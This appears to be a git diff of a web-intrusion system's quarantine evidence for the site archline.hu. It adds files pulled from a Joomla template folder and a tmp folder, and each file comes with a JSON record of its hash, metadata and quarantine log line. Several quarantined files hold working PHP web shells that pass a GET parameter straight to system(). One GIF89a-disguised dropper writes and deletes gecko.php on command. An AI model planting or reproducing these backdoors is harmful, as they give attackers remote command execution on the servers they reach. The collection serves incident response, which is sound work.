b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_znv7fh9d.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_znv7fh9d.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_znv7fh9d.php.json.evidence.json new file mode 100644 index 0000000..2a14d3a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_znv7fh9d.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2999", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/_h3x_znv7fh9d.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/_h3x_znv7fh9d.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783842127, + "size": 45, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/_h3x_znv7fh9d.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/amwhwyys.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/amwhwyys.php.json new file mode 100644 index 0000000..982bc2b --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/amwhwyys.php.json @@ -0,0 +1 @@ +';if(isset($_GET['cmd'])){echo'
';system($_GET['cmd']);echo'
';}echo'';?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/amwhwyys.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/amwhwyys.php.json.evidence.json new file mode 100644 index 0000000..d367c79 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/amwhwyys.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3024", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/amwhwyys.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/amwhwyys.php.json)", + "original_sha256": "5f9fadd5d78ebe33acaa6f95602ea8b6ba716fe64dac17a20c259ecd32f2dacb", + "original_stat": { + "gid": 30037, + "mtime": 1784057813, + "size": 146, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/amwhwyys.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_0134a6.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_0134a6.php.json new file mode 100644 index 0000000..14749c0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_0134a6.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_0134a6.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_0134a6.php.json.evidence.json new file mode 100644 index 0000000..6ffe970 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_0134a6.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3011", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/css_0134a6.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_0134a6.php.json)", + "original_sha256": "c26fb4336d91124d0f631f998dd1f7e8fd9fa444671f046715f4fb883f6594e8", + "original_stat": { + "gid": 30037, + "mtime": 1783937208, + "size": 89, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/css_0134a6.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_4470f6.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_4470f6.php.json new file mode 100644 index 0000000..14749c0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_4470f6.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_4470f6.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_4470f6.php.json.evidence.json new file mode 100644 index 0000000..b707f05 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_4470f6.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3019", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/css_4470f6.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_4470f6.php.json)", + "original_sha256": "c26fb4336d91124d0f631f998dd1f7e8fd9fa444671f046715f4fb883f6594e8", + "original_stat": { + "gid": 30037, + "mtime": 1783946116, + "size": 89, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/css_4470f6.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_8413ca.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_8413ca.php.json new file mode 100644 index 0000000..14749c0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_8413ca.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_8413ca.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_8413ca.php.json.evidence.json new file mode 100644 index 0000000..873e215 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_8413ca.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3027", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/css_8413ca.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_8413ca.php.json)", + "original_sha256": "c26fb4336d91124d0f631f998dd1f7e8fd9fa444671f046715f4fb883f6594e8", + "original_stat": { + "gid": 30037, + "mtime": 1783936680, + "size": 89, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/css_8413ca.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_c5a6d6.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_c5a6d6.php.json new file mode 100644 index 0000000..14749c0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_c5a6d6.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_c5a6d6.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_c5a6d6.php.json.evidence.json new file mode 100644 index 0000000..725e395 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_c5a6d6.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3015", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/css_c5a6d6.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/css_c5a6d6.php.json)", + "original_sha256": "c26fb4336d91124d0f631f998dd1f7e8fd9fa444671f046715f4fb883f6594e8", + "original_stat": { + "gid": 30037, + "mtime": 1783936723, + "size": 89, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/css_c5a6d6.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_3ntstihn.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_3ntstihn.php.json new file mode 100644 index 0000000..59b5034 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_3ntstihn.php.json @@ -0,0 +1,11 @@ +GIF89a +');echo "x";} + elseif($c=="d"){@unlink("gecko.php");echo "d";} + else{echo "r";} +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_3ntstihn.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_3ntstihn.php.json.evidence.json new file mode 100644 index 0000000..fd1c3ea --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_3ntstihn.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3017", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/h3x_3ntstihn.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_3ntstihn.php.json)", + "original_sha256": "cf2acdfb2ee5a9e2144d442180249bd76b5d6f4602a167e54410b08d46da150c", + "original_stat": { + "gid": 30037, + "mtime": 1783999802, + "size": 296, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/h3x_3ntstihn.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_zli4yqss.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_zli4yqss.php.json new file mode 100644 index 0000000..59b5034 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_zli4yqss.php.json @@ -0,0 +1,11 @@ +GIF89a +');echo "x";} + elseif($c=="d"){@unlink("gecko.php");echo "d";} + else{echo "r";} +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_zli4yqss.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_zli4yqss.php.json.evidence.json new file mode 100644 index 0000000..6ceb50c --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_zli4yqss.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3007", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/h3x_zli4yqss.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/h3x_zli4yqss.php.json)", + "original_sha256": "cf2acdfb2ee5a9e2144d442180249bd76b5d6f4602a167e54410b08d46da150c", + "original_stat": { + "gid": 30037, + "mtime": 1783864206, + "size": 296, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/h3x_zli4yqss.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_553602.php.json.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_553602.php.json.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_553602.php.json.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_553602.php.json.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_553602.php.json.json.evidence.json new file mode 100644 index 0000000..1a81973 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_553602.php.json.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3003", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/rce_553602.php.json.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_553602.php.json.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783877182, + "size": 57, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/rce_553602.php.json.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_68a921.php.json.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_68a921.php.json.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_68a921.php.json.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_68a921.php.json.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_68a921.php.json.json.evidence.json new file mode 100644 index 0000000..6cf7781 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_68a921.php.json.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3018", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/rce_68a921.php.json.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_68a921.php.json.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783878611, + "size": 57, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/rce_68a921.php.json.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_ddeda3.php.json.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_ddeda3.php.json.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_ddeda3.php.json.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_ddeda3.php.json.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_ddeda3.php.json.json.evidence.json new file mode 100644 index 0000000..8315008 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_ddeda3.php.json.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3010", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/rce_ddeda3.php.json.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_ddeda3.php.json.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783877166, + "size": 57, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/rce_ddeda3.php.json.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_f2c518.php.json.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_f2c518.php.json.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_f2c518.php.json.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_f2c518.php.json.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_f2c518.php.json.json.evidence.json new file mode 100644 index 0000000..79af0de --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_f2c518.php.json.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3002", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/rce_f2c518.php.json.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/rce_f2c518.php.json.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783877337, + "size": 57, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/rce_f2c518.php.json.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/up.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/up.php.json new file mode 100644 index 0000000..d90257a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/up.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/up.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/up.php.json.evidence.json new file mode 100644 index 0000000..688fd37 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/up.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3023", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/layout/up.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/layout/up.php.json)", + "original_sha256": "72c1cbd426978b60ec75a15472d96080aa8edf3667d91139557276f7449b2483", + "original_stat": { + "gid": 30037, + "mtime": 1784033880, + "size": 15, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/layout/up.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_91tax5.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_91tax5.php.json new file mode 100644 index 0000000..c1854f3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_91tax5.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_91tax5.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_91tax5.php.json.evidence.json new file mode 100644 index 0000000..f164c2d --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_91tax5.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2995", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/rce_91tax5.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_91tax5.php.json)", + "original_sha256": "eff6ad6424feaa82e756ab3264e8689f6293d56dd50f97e585c9572e2ae4cfaf", + "original_stat": { + "gid": 30037, + "mtime": 1783812868, + "size": 117, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/rce_91tax5.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_9rtxvu.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_9rtxvu.php.json new file mode 100644 index 0000000..24c02b8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_9rtxvu.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_9rtxvu.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_9rtxvu.php.json.evidence.json new file mode 100644 index 0000000..4b9e85e --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_9rtxvu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2970", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/rce_9rtxvu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/rce_9rtxvu.php.json)", + "original_sha256": "9ba4b855f3bf60b7e6bf5678beca5959f76b278e4fbd911434d08c5ba0f17926", + "original_stat": { + "gid": 30037, + "mtime": 1783812977, + "size": 117, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/rce_9rtxvu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/up.php.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/up.php.json new file mode 100644 index 0000000..d90257a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/up.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/shaper_helix3/up.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/shaper_helix3/up.php.json.evidence.json new file mode 100644 index 0000000..cdb6e49 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/shaper_helix3/up.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2982", + "log_excerpt": "[quarantine] www.archline.hu:templates/shaper_helix3/up.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/shaper_helix3/up.php.json)", + "original_sha256": "72c1cbd426978b60ec75a15472d96080aa8edf3667d91139557276f7449b2483", + "original_stat": { + "gid": 30037, + "mtime": 1784033908, + "size": 15, + "uid": 20043 + }, + "rel_path": "templates/shaper_helix3/up.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/up.php.json b/var/www/hosting/archline.hu/www/templates/up.php.json new file mode 100644 index 0000000..d90257a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/up.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/up.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/up.php.json.evidence.json new file mode 100644 index 0000000..754acfb --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/up.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2949", + "log_excerpt": "[quarantine] www.archline.hu:templates/up.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/up.php.json)", + "original_sha256": "72c1cbd426978b60ec75a15472d96080aa8edf3667d91139557276f7449b2483", + "original_stat": { + "gid": 30037, + "mtime": 1784033927, + "size": 15, + "uid": 20043 + }, + "rel_path": "templates/up.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/tmp/i9wliit0.php.json b/var/www/hosting/archline.hu/www/tmp/i9wliit0.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/i9wliit0.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/tmp/i9wliit0.php.json.evidence.json b/var/www/hosting/archline.hu/www/tmp/i9wliit0.php.json.evidence.json new file mode 100644 index 0000000..b8fd0f9 --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/i9wliit0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3533", + "log_excerpt": "[quarantine] www.archline.hu:tmp/i9wliit0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/tmp/i9wliit0.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783930711, + "size": 57, + "uid": 20043 + }, + "rel_path": "tmp/i9wliit0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..b89becd --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3559", + "log_excerpt": "[quarantine] www.archline.hu:tmp/r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111931, + "size": 74, + "uid": 20043 + }, + "rel_path": "tmp/r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..0053c96 --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3562", + "log_excerpt": "[quarantine] www.archline.hu:tmp/r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/tmp/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111915, + "size": 74, + "uid": 20043 + }, + "rel_path": "tmp/r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..483663a --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3531", + "log_excerpt": "[quarantine] www.archline.hu:tmp/r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111767, + "size": 74, + "uid": 20043 + }, + "rel_path": "tmp/r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..a13dc04 --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3556", + "log_excerpt": "[quarantine] www.archline.hu:tmp/r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/tmp/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111751, + "size": 74, + "uid": 20043 + }, + "rel_path": "tmp/r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo 